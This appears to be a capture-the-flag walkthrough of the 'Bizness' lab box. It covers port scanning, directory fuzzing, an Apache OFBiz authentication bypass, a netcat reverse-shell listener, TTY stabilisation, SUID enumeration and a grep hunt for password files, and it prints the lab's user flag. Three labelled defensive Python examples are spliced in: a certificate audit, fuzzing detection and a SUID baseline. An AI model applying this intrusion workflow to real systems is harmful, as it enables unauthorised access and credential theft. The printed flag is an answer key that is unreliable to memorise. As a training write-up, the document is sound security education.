Bizness

First, we send an ICMP packet to check that we have connectivity between our machine and the victim machine.

❯ ping -c 1 10.10.11.252
PING 10.10.11.252 (10.10.11.252) 56(84) bytes of data.
64 bytes from 10.10.11.252: icmp_seq=1 ttl=63 time=111 ms

--- 10.10.11.252 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 111.295/111.295/111.295/0.000 ms

❯ whichSystem.py 10.10.11.252

	10.10.11.252 (ttl -> 63): Linux

It responds, and we can see that we are facing a Linux machine, so let's start enumerating to see which ports are open on the system.

❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.252 -oG allPorts
[sudo] password for oso: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 13:29 EDT
Initiating SYN Stealth Scan at 13:29
Scanning 10.10.11.252 [65535 ports]
Discovered open port 443/tcp on 10.10.11.252
Discovered open port 80/tcp on 10.10.11.252
Discovered open port 22/tcp on 10.10.11.252
Discovered open port 32995/tcp on 10.10.11.252
Completed SYN Stealth Scan at 13:29, 14.93s elapsed (65535 total ports)
Nmap scan report for 10.10.11.252
Host is up, received user-set (0.11s latency).
Scanned at 2024-05-29 13:29:32 EDT for 15s
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 63
443/tcp   open  https   syn-ack ttl 63
32995/tcp open  unknown syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.09 seconds
           Raw packets sent: 73521 (3.235MB) | Rcvd: 72952 (2.918MB)
❯ extractPorts allPorts
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: extractPorts.tmp
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ 
   2   │ [*] Extracting information...
   3   │ 
   4   │     [*] IP Address: 10.10.11.252
   5   │     [*] Open ports: 22,80,443,32995
   6   │ 
   7   │ [*] Ports copied to clipboard

Now I'm going to run a thorough scan to identify the services and versions we are dealing with.


❯ nmap -sCV -p22,80,443,32995 10.10.11.252 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 13:37 EDT
Nmap scan report for bizness.htb (10.10.11.252)
Host is up (0.11s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp    open  http       nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp   open  ssl/http   nginx 1.18.0
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_http-title: BizNess Incorporated
|_http-server-header: nginx/1.18.0
32995/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.45 seconds

We can see that it is running OpenSSH 8.4p1 Debian 5+deb11u3.

I'm going to use a web analysis tool to identify the technologies in use and discover relevant information.

❯ whatweb https://bizness.htb/
https://bizness.htb/ [200 OK] Bootstrap, Cookies[JSESSIONID], Country[RESERVED][ZZ], Email[info@bizness.htb], HTML5, HTTPServer[nginx/1.18.0], HttpOnly[JSESSIONID], IP[10.10.11.252], JQuery, Lightbox, Script, Title[BizNess Incorporated], nginx[1.18.0]

Similar to whatweb, there is the Wappalyzer extension.

** Outdated jQuery versions make it possible to exploit prototype pollution and XSS vulnerabilities. **

We can inspect the SSL certificate by connecting to bizness.htb on port 443 as follows:

❯ openssl s_client -connect bizness.htb:443
Connecting to 10.10.11.252
CONNECTED(00000003)
depth=0 C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
verify error:num=18:self-signed certificate
verify return:1
depth=0 C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
verify return:1
---
Certificate chain
 0 s:C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
   i:C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Dec 14 20:03:40 2023 GMT; NotAfter: Nov 10 20:03:40 2328 GMT
---
Server certificate
subject=C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
issuer=C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1441 bytes and written 538 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
This TLS version forbids renegotiation.
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
read R BLOCK
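
The properties visible in this output (self-signed, default OpenSSL subject fields, a validity period running to 2328) can be checked mechanically. The following Python is an added example, not part of the original write-up: it parses `openssl s_client` text and reports those findings. The function names, the 398-day validity threshold and the embedded sample (lines copied from the output above) are assumptions of the example.

```python
import re
from datetime import datetime

# Constructed sample: the certificate-related lines of the s_client output above.
SAMPLE = """\
depth=0 C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
verify error:num=18:self-signed certificate
Certificate chain
 0 s:C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
   i:C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Dec 14 20:03:40 2023 GMT; NotAfter: Nov 10 20:03:40 2328 GMT
subject=C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
issuer=C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Verify return code: 18 (self-signed certificate)
"""

# Assumption: policy threshold borrowed from the 398-day cap that browsers
# apply to publicly trusted TLS certificates.
MAX_VALIDITY_DAYS = 398
MIN_RSA_BITS = 2048
# Default DN values shipped in OpenSSL's stock configuration.
OPENSSL_PLACEHOLDERS = ("Internet Widgits Pty Ltd", "Some-State")
DATE_FMT = "%b %d %H:%M:%S %Y GMT"

PATTERNS = {
    "subject": r"^subject=(.+)$",
    "issuer": r"^issuer=(.+)$",
    "not_before": r"NotBefore: (.+? GMT)",
    "not_after": r"NotAfter: (.+? GMT)",
    "key_bits": r"^Server public key is (\d+) bit",
    "verify_code": r"^\s*Verify return code: (\d+)",
    "protocol": r"^New, (\S+), Cipher is",
}


def parse_s_client(text):
    """Extract the first occurrence of each field; absent fields become None."""
    fields = {}
    for name, pattern in PATTERNS.items():
        match = re.search(pattern, text, re.MULTILINE)
        fields[name] = match.group(1).strip() if match else None
    return fields


def audit_certificate(fields):
    """Return {finding_id: detail} for the parsed s_client fields."""
    findings = {}
    missing = sorted(k for k, v in fields.items() if v is None)
    if missing:
        # Truncated or older-format output: report it instead of guessing.
        findings["incomplete-output"] = "missing: " + ", ".join(missing)

    subject, issuer = fields["subject"], fields["issuer"]
    if subject and subject == issuer:
        findings["self-issued"] = "subject and issuer are identical"
    if fields["verify_code"] not in (None, "0"):
        findings["untrusted-chain"] = "verify return code " + fields["verify_code"]
    if subject and any(p in subject for p in OPENSSL_PLACEHOLDERS):
        findings["placeholder-subject"] = "default OpenSSL DN values in subject"

    if fields["not_before"] and fields["not_after"]:
        start = datetime.strptime(fields["not_before"], DATE_FMT)
        end = datetime.strptime(fields["not_after"], DATE_FMT)
        days = (end - start).days
        if days > MAX_VALIDITY_DAYS:
            findings["excessive-validity"] = f"{days} days"

    if fields["key_bits"] and int(fields["key_bits"]) < MIN_RSA_BITS:
        findings["weak-key"] = fields["key_bits"] + " bit"
    return findings


if __name__ == "__main__":
    for finding, detail in audit_certificate(parse_s_client(SAMPLE)).items():
        print(f"{finding}: {detail}")
```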

If we look at the bottom of the page, we see that it says "Powered by Apache OFBiz".

Let's fuzz directories with wfuzz to try to find hidden directories. I'm going to use SecLists, a collection of lists that includes usernames, passwords, URLs, sensitive data, patterns, fuzzing payloads, web shells…

❯ wfuzz -c --hc=404,302 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt https://bizness.htb/FUZZ

Now, if we do the same for the "control" directory we found, we get a login page.

❯ wfuzz -c --hc=404,302 --hw=1596 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt https://bizness.htb/control/FUZZ
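
Seen from the server, a run like the two above is a burst of requests from one address, almost all answered with the status codes that `--hc` hides on the client side. The following Python is an added example, not part of the original write-up: it scans nginx access-log lines for that pattern and lists the paths that did not miss, which is what the scan revealed. The log lines are constructed, and the function names, thresholds and the 192.0.2.10 client are assumptions of the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# nginx "combined" format: ip - user [time] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
MISS_STATUSES = {"404", "302"}  # the codes hidden with --hc in the runs above


def _line(ip, ts, path, status):
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S") + " -0400"
    return f'{ip} - - [{stamp}] "GET {path} HTTP/1.1" {status} 153 "-" "-"'


def make_sample_log():
    """Constructed log: one client cycling through a wordlist, one normal client."""
    start = datetime(2024, 5, 29, 13, 40, 0)
    lines = []
    for i in range(120):
        hit = i == 57  # a single wordlist entry that exists
        lines.append(_line("10.10.14.222", start + timedelta(milliseconds=25 * i),
                           "/control" if hit else f"/word{i}", 200 if hit else 404))
    normal = [("/", 200), ("/css/style.css", 200), ("/old.png", 404), ("/", 200)]
    for i, (path, status) in enumerate(normal):
        lines.append(_line("192.0.2.10", start + timedelta(seconds=20 * i), path, status))
    return lines


def detect_content_discovery(lines, window=timedelta(seconds=10), min_requests=100,
                             min_miss_ratio=0.9, min_distinct_ratio=0.9):
    """Flag clients whose busiest window is large, mostly misses, mostly unique paths."""
    per_ip = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # skip lines that are not in the expected format
        per_ip[m["ip"]].append((datetime.strptime(m["ts"], TS_FMT), m["path"], m["status"]))

    alerts = {}
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e[0])
        win = deque()
        for event in events:
            win.append(event)
            while event[0] - win[0][0] > window:
                win.popleft()  # drop requests older than the window
            n = len(win)
            if n < min_requests:
                continue
            misses = sum(1 for e in win if e[2] in MISS_STATUSES)
            distinct = len({e[1] for e in win})
            if misses / n < min_miss_ratio or distinct / n < min_distinct_ratio:
                continue
            if ip not in alerts or n > alerts[ip]["requests"]:
                alerts[ip] = {
                    "requests": n,
                    "miss_ratio": round(misses / n, 3),
                    # Paths that did not miss: what the client learned exists.
                    "hits": sorted({e[1] for e in win if e[2] not in MISS_STATUSES}),
                }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_content_discovery(make_sample_log()).items():
        print(ip, info)
```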

I'm going to clone the following repo, Apache-OFBiz-Authentication-Bypass, and check whether it is vulnerable.

❯ python3 xdetection.py --url https://bizness.htb/
[+] Scanning started...
[+] Apache OFBiz instance seems to be vulnerable.

Let's exploit it. I'm going to capture ICMP traffic on interface 0 and try sending a ping to see whether we receive it.

As we can see, we managed to execute a command, because we did receive it. Let's send ourselves a bash shell over port 443.

Now let's stabilize the TTY. As always, we type the following:

❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.222] from (UNKNOWN) [10.10.11.252] 58810
script /dev/null -c bash
Script started, output log file is '/dev/null'.
ofbiz@bizness:/opt/ofbiz$ ^Z
zsh: suspended  nc -nlvp 443
❯ stty raw -echo; fg
[2]  - continued  nc -nlvp 443
                              reset xterm

Now we can press Ctrl + C without dropping out of the terminal. If we want Ctrl + L to work, we do the following:

ofbiz@bizness:/opt/ofbiz$ export TERM=xterm

The only thing left is the terminal dimensions for nano.

ofbiz@bizness:/opt/ofbiz$ stty size
24 80
ofbiz@bizness:/opt/ofbiz$ stty rows 44 columns 184
ofbiz@bizness:/opt/ofbiz$ stty size
44 184

And with that, the TTY treatment is complete.

USER FLAG
---------------------------

ofbiz@bizness:/opt/ofbiz$ pwd
/opt/ofbiz
ofbiz@bizness:/opt/ofbiz$ cd /home
ofbiz@bizness:/home$ ls
ofbiz
ofbiz@bizness:/home$ cd ofbiz/
ofbiz@bizness:~$ ls
user.txt
ofbiz@bizness:~$ cat user.txt
bd81fb57590b1e511d008f79b49c0ff8
ofbiz@bizness:~$ 

I try to list the user's sudo privileges, but it asks for a password.

ofbiz@bizness:~$ sudo -l
[sudo] password for ofbiz: 
Sorry, try again.
[sudo] password for ofbiz:

Now I'm going to get the information about the OS distribution.

ofbiz@bizness:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 11 (bullseye)
Release:	11
Codename:	bullseye

We can also show the OS and the Linux kernel that is running.

ofbiz@bizness:~$ uname -a
Linux bizness 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64 GNU/Linux

Linux: indicates that the operating system is Linux. || bizness: the machine's hostname (in this case, bizness). || 5.10.0-28-amd64: the Linux kernel version.

I'm going to search from the root (/) of the system for files with the SUID bit set, to see whether there is any SUID binary owned by root that can be exploited.

ofbiz@bizness:~$ find / -perm -4000 2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

To verify that they are owned by root, we can run:

ofbiz@bizness:~$ ls -l /usr/bin/mount /usr/bin/su /usr/bin/fusermount /usr/bin/sudo /usr/bin/newgrp /usr/bin/chsh /usr/bin/passwd /usr/bin/gpasswd /usr/bin/chfn /usr/bin/umount /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root        58416 Feb  7  2020 /usr/bin/chfn
-rwsr-xr-x 1 root root        52880 Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root        34896 Feb 26  2021 /usr/bin/fusermount
-rwsr-xr-x 1 root root        88304 Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        55528 Jan 20  2022 /usr/bin/mount
-rwsr-xr-x 1 root root        44632 Feb  7  2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root        63960 Feb  7  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root        71912 Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root       182600 Jan 14  2023 /usr/bin/sudo
-rwsr-xr-x 1 root root        35040 Jan 20  2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus  51336 Jun  6  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root       481608 Dec 21 11:09 /usr/lib/openssh/ssh-keysign
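
The same listing is what a defender keeps as a baseline: any SUID file that appears later, changes size or ownership, or becomes writable by someone other than its owner deserves a look. The following Python is an added example, not part of the original write-up: it parses `ls -l` output and diffs two snapshots. Treating the listing above as the known-good state is an assumption, and the second snapshot, the path /usr/local/bin/report-gen and the function names are constructed for the example.

```python
from typing import NamedTuple

# Baseline: the `ls -l` listing shown above, treated as known-good (assumption).
BASELINE_LS = """\
-rwsr-xr-x 1 root root        58416 Feb  7  2020 /usr/bin/chfn
-rwsr-xr-x 1 root root        52880 Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root        34896 Feb 26  2021 /usr/bin/fusermount
-rwsr-xr-x 1 root root        88304 Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        55528 Jan 20  2022 /usr/bin/mount
-rwsr-xr-x 1 root root        44632 Feb  7  2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root        63960 Feb  7  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root        71912 Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root       182600 Jan 14  2023 /usr/bin/sudo
-rwsr-xr-x 1 root root        35040 Jan 20  2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus  51336 Jun  6  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root       481608 Dec 21 11:09 /usr/lib/openssh/ssh-keysign
"""

# Constructed later snapshot: passwd has a different size, and a new
# world-writable SUID file (hypothetical path) has appeared.
CURRENT_LS = BASELINE_LS.replace(
    "63960 Feb  7  2020 /usr/bin/passwd", "70112 May 30 09:14 /usr/bin/passwd"
) + "-rwsr-xrwx 1 root root        16712 May 30 09:15 /usr/local/bin/report-gen\n"


class SuidEntry(NamedTuple):
    mode: str
    owner: str
    group: str
    size: int
    path: str


def parse_ls_listing(text):
    """Parse `ls -l` lines into {path: SuidEntry}; unparseable lines are skipped."""
    entries = {}
    for line in text.splitlines():
        parts = line.split(None, 8)  # mode links owner group size mon day time path
        if len(parts) != 9 or len(parts[0]) < 10 or not parts[4].isdigit():
            continue
        mode, _links, owner, group, size, *_date, path = parts
        # mode[:10] drops a trailing ACL/SELinux marker such as '+' or '.'
        entries[path] = SuidEntry(mode[:10], owner, group, int(size), path)
    return entries


def audit_suid(baseline, current):
    """Return (path, finding) pairs describing drift from the baseline."""
    findings = []
    for path, entry in sorted(current.items()):
        if entry.mode[3] not in "sS":
            continue  # setuid bit not set
        known = baseline.get(path)
        if known is None:
            findings.append((path, "new-suid"))
        else:
            if (entry.mode, entry.owner, entry.group) != (known.mode, known.owner, known.group):
                findings.append((path, "mode-or-owner-changed"))
            if entry.size != known.size:
                findings.append((path, "size-changed"))
        # Group- or world-writable SUID file: non-owners can replace its contents.
        if entry.mode[5] == "w" or entry.mode[8] == "w":
            findings.append((path, "writable-by-non-owner"))
    for path in sorted(set(baseline) - set(current)):
        findings.append((path, "missing-from-snapshot"))
    return findings


if __name__ == "__main__":
    base = parse_ls_listing(BASELINE_LS)
    for path, finding in audit_suid(base, parse_ls_listing(CURRENT_LS)):
        print(f"{finding:24} {path}")
```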

But nothing looks promising. I'm going to search recursively (r) in the current directory and its subdirectories for files that contain "password", case-insensitively (i), listing only the names of those files (l).

ofbiz@bizness:/opt/ofbiz$ grep -ril "password"
applications/accounting/data/helpdata/HELP_ACCOUNTING_EditPaymentGatewayConfig.xml
applications/accounting/config/AccountingUiLabels.xml
applications/accounting/config/payment.properties
applications/accounting/config/paymentTest.properties
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/authorizedotnet/AIMPaymentServices.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/eway/EwayServices.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/eway/GatewayRequest.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/orbital/OrbitalPaymentServices.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/verisign/PayflowPro.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/clearcommerce/CCPaymentServices.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/paypal/PayPalServices.java
applications/order/minilang/customer/CustomerEvents.xml
applications/marketing/testdef/CommEventCreateOpportunity_testsuite.xml
applications/workeffort/config/WorkEffortUiLabels.xml
applications/content/template/survey/ViewSurveyResponses.ftl
applications/content/template/survey/GenericSurvey.ftl
applications/content/config/ContentEntityLabels.xml
applications/content/src/main/java/org/apache/ofbiz/content/ftp/FtpServices.java
applications/content/src/main/java/org/apache/ofbiz/content/ftp/SimpleFtpClient.java
applications/content/src/main/java/org/apache/ofbiz/content/ftp/SshFtpClient.java
applications/content/src/main/java/org/apache/ofbiz/content/ftp/FtpClientInterface.java
applications/content/src/main/java/org/apache/ofbiz/content/ftp/SecureFtpClient.java
applications/content/minilang/survey/SurveyServices.xml
applications/product/data/ApiSchemaDhl.xml
applications/product/config/ProductEntityLabels.xml
applications/product/config/shipment.properties
applications/product/config/ProductUiLabels.xml
applications/product/src/main/java/org/apache/ofbiz/shipment/thirdparty/ups/UpsServices.java
applications/product/src/main/java/org/apache/ofbiz/shipment/thirdparty/dhl/DhlServices.java
applications/product/src/main/java/org/apache/ofbiz/shipment/thirdparty/usps/UspsServices.java
applications/product/src/main/java/org/apache/ofbiz/product/store/ProductStoreWorker.java
applications/product/widget/catalog/StoreForms.xml
applications/product/widget/facility/ShipmentGatewayConfigForms.xml
applications/datamodel/data/demo/WorkEffortDemoData.xml
applications/datamodel/data/demo/HumanresDemoData.xml
applications/datamodel/data/demo/MarketingDemoData.xml
applications/datamodel/data/demo/PartyDemoData.xml
applications/datamodel/data/demo/ProductDemoData.xml
applications/datamodel/data/demo/OrderDemoData.xml
applications/datamodel/data/demo/SecurityExtDemoData.xml
applications/datamodel/data/demo/ContentDemoData.xml
applications/datamodel/data/demo/AccountingDemoData.xml
applications/datamodel/data/seed/ContentSeedData.xml
applications/datamodel/data/seed/ProductSeedData.xml
applications/datamodel/entitydef/product-entitymodel.xml
applications/datamodel/entitydef/shipment-entitymodel.xml
applications/datamodel/entitydef/party-entitymodel.xml
applications/datamodel/entitydef/accounting-entitymodel.xml
applications/party/template/party/EditContactMech.ftl
applications/party/template/party/profileblocks/Contact.ftl
applications/party/webapp/partymgr/WEB-INF/controller.xml
applications/party/config/PartyUiLabels.xml
applications/party/widget/partymgr/PartyScreens.xml
applications/party/widget/partymgr/PartyForms.xml
applications/party/servicedef/secas.xml
applications/party/servicedef/services.xml
applications/party/minilang/customer/CustomerEvents.xml
applications/party/minilang/user/UserEvents.xml
applications/party/minilang/test/PartyTests.xml
applications/party/testdef/data/PartyContactMechTestData.xml
applications/securityext/template/email/PasswordEmail.ftl
applications/securityext/config/EmailPasswordUiLabels.xml
applications/securityext/src/main/java/org/apache/ofbiz/securityext/login/LoginEvents.java
applications/securityext/widget/EmailSecurityScreens.xml
applications/securityext/minilang/login/LoginSimpleEvents.xml
applications/securityext/minilang/login/LoginMapProcs.xml
applications/commonext/data/helpdata/HELP_SETUP.xml
applications/commonext/data/helpdata/HELP_SystemInfoNotes.xml
applications/commonext/widget/ofbizsetup/SetupForms.xml
applications/commonext/minilang/setup/SetupEvents.xml
runtime/data/derby/ofbiz/seg0/c6010.dat
runtime/data/derby/ofbiz/seg0/c6850.dat
runtime/data/derby/ofbiz/seg0/c5fa1.dat
runtime/data/derby/ofbiz/seg0/c180.dat
runtime/data/derby/ofbiz/seg0/c54d0.dat
runtime/data/derby/ofbiz/seg0/ca1.dat
runtime/data/derby/ofbiz/seg0/c6021.dat
runtime/data/derby/ofbiz/seg0/c60.dat
runtime/data/derby/ofbiz/seg0/c5f90.dat
runtime/data/derby/ofbiz/seg0/c191.dat
runtime/data/derby/ofbiz/seg0/c90.dat
runtime/data/derby/ofbiz/seg0/c71.dat
runtime/data/derby/ofbiz/seg0/c1930.dat
runtime/data/derby/ofbiz/seg0/c1c70.dat
runtime/data/derby/ofbiz/log/log37.dat
runtime/data/derby/ofbizolap/seg0/c180.dat
runtime/data/derby/ofbizolap/seg0/ca1.dat
runtime/data/derby/ofbizolap/seg0/c191.dat
runtime/data/derby/ofbizolap/seg0/c90.dat
runtime/data/derby/ofbiztenant/seg0/c180.dat
runtime/data/derby/ofbiztenant/seg0/ca1.dat
runtime/data/derby/ofbiztenant/seg0/c191.dat
runtime/data/derby/ofbiztenant/seg0/c90.dat
runtime/data/derby/ofbiztenant/log/log1.dat
runtime/logs/error.log
runtime/logs/access_log..2023-12-20
runtime/logs/ofbiz.log
runtime/logs/ofbiz-2023-12-16-1.log
runtime/logs/ofbiz-2023-12-16-2.log
runtime/logs/access_log..2024-05-30
runtime/logs/access_log..2023-12-16
runtime/tmp/README.adoc
framework/webapp/config/fop.properties
framework/webapp/src/main/java/org/apache/ofbiz/webapp/event/XmlRpcEventHandler.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/webdav/WebDavUtil.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/ExternalLoginKeysManager.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/LoginWorker.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/JWTManager.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/view/ApacheFopWorker.java
framework/webapp/dtd/site-conf.xsd
framework/entity/config/entityengine.xml
framework/entity/src/main/java/org/apache/ofbiz/entity/datasource/GenericHelperInfo.java
framework/entity/src/main/java/org/apache/ofbiz/entity/GenericDelegator.java
framework/entity/src/main/java/org/apache/ofbiz/entity/config/model/EntityConfig.java
framework/entity/src/main/java/org/apache/ofbiz/entity/config/model/InlineJdbc.java
framework/entity/src/main/java/org/apache/ofbiz/entity/model/ModelEntityChecker.java
framework/entity/src/main/java/org/apache/ofbiz/entity/connection/DBCPConnectionFactory.java
framework/entity/src/main/java/org/apache/ofbiz/entity/jdbc/DatabaseUtil.java
framework/entity/dtd/entity-config.xsd
framework/entity/entitydef/entitymodel.xml
framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/FormStringRenderer.java
framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/macro/MacroFormRenderer.java
framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/fo/FoFormRenderer.java
framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/fo/ScreenFopViewHandler.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/ModelFormField.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/XmlWidgetFieldVisitor.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/FieldInfo.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/ModelFieldVisitor.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/ModelScreen.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/ModelFormFieldBuilder.java
framework/widget/src/main/java/org/apache/ofbiz/widget/artifact/ArtifactInfoGatherer.java
framework/widget/src/main/java/org/apache/ofbiz/widget/test/WidgetMacroLibraryTests.java
framework/widget/dtd/widget-form.xsd
framework/documents/SingleSignOn.xml
framework/service/ofbiz-component.xml
framework/service/config/serviceengine.xml
framework/service/config/axis2/conf/axis2.xml
framework/service/src/main/java/org/apache/ofbiz/service/ServiceDispatcher.java
framework/service/src/main/java/org/apache/ofbiz/service/engine/XMLRPCClientEngine.java
framework/service/src/main/java/org/apache/ofbiz/service/config/model/Server.java
framework/service/src/main/java/org/apache/ofbiz/service/mail/JavaMailContainer.java
framework/service/src/main/java/org/apache/ofbiz/service/ModelServiceReader.java
framework/service/src/main/java/org/apache/ofbiz/service/xmlrpc/AliasSupportedTransportFactory.java
framework/service/src/main/java/org/apache/ofbiz/service/xmlrpc/XmlRpcClient.java
framework/service/src/main/java/org/apache/ofbiz/service/ModelService.java
framework/service/src/main/java/org/apache/ofbiz/service/rmi/socket/ssl/SSLServerSocketFactory.java
framework/service/src/main/java/org/apache/ofbiz/service/jms/JmsQueueListener.java
framework/service/src/main/java/org/apache/ofbiz/service/jms/JmsListenerFactory.java
framework/service/src/main/java/org/apache/ofbiz/service/jms/JmsTopicListener.java
framework/service/src/main/java/org/apache/ofbiz/service/jms/JmsServiceEngine.java
framework/service/src/main/java/org/apache/ofbiz/service/test/AbstractXmlRpcTestCase.java
framework/service/src/main/java/org/apache/ofbiz/service/test/XmlRpcTests.java
framework/service/dtd/service-config.xsd
framework/service/servicedef/services.xml
framework/catalina/src/main/java/org/apache/ofbiz/catalina/container/OFBizRealm.java
framework/catalina/src/main/java/org/apache/ofbiz/catalina/container/CatalinaContainer.java
framework/catalina/src/main/java/org/apache/ofbiz/catalina/container/SimpleCredentialHandler.java
framework/catalina/src/main/java/org/apache/ofbiz/catalina/container/HashedCredentialHandler.java
framework/base/config/jsse.properties
framework/base/config/README
framework/base/config/passwords.properties
framework/base/config/jndi.properties
framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java
framework/base/src/main/java/org/apache/ofbiz/base/util/HttpClient.java
framework/base/src/main/java/org/apache/ofbiz/base/util/UtilHttp.java
framework/base/src/main/java/org/apache/ofbiz/base/util/KeyStoreUtil.java
framework/base/src/main/java/org/apache/ofbiz/base/util/SSLUtil.java
framework/base/src/main/java/org/apache/ofbiz/base/util/FileUtil.java
framework/base/src/main/java/org/apache/ofbiz/base/component/ComponentConfig.java
framework/base/dtd/ofbiz-component.xsd
framework/resources/templates/AdminUserLoginData.xml
framework/resources/templates/AdminNewTenantData-PostgreSQL.xml
framework/resources/templates/AdminNewTenantData-Oracle.xml
framework/resources/templates/AdminNewTenantData-Derby.xml
framework/resources/templates/AdminNewTenantData-MySQL.xml
framework/common/data/CommonSystemPropertyData.xml
framework/common/data/CommonTypeData.xml
framework/common/config/SecurityUiLabels.xml
framework/common/config/general.properties
framework/common/config/CommonUiLabels.xml
